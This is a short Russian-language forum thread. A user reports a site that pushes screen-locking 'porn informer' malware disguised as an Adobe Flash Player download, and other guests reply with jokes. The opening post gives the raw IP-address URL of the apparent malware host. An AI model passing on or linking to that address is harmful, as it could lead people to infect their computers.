Нашол сайт с порноинформером
Нашол сайт с порноинформеромзагрузается под видом Adobe Flash Player http://193.104.153.249/xxx/?uid=4
Ответ(ы) на вопрос:
Гость
Так отправь
Гость
Таких сайтов сотня, набири просто бесплатное порно, иль что нить в этом духе и ты найдешь )) Зы. меньше надо по порнушным сайтам лазить))
Гость
Давай чего ты ждёшь, ты можешь спасти несколько невинных и беззащитных компьтериков! ! И тогда в мире вновь воцарится баланс между тьмой и светом.
Гость
Смешной человек. На этих сайтах здесь чуть ли не все побывали))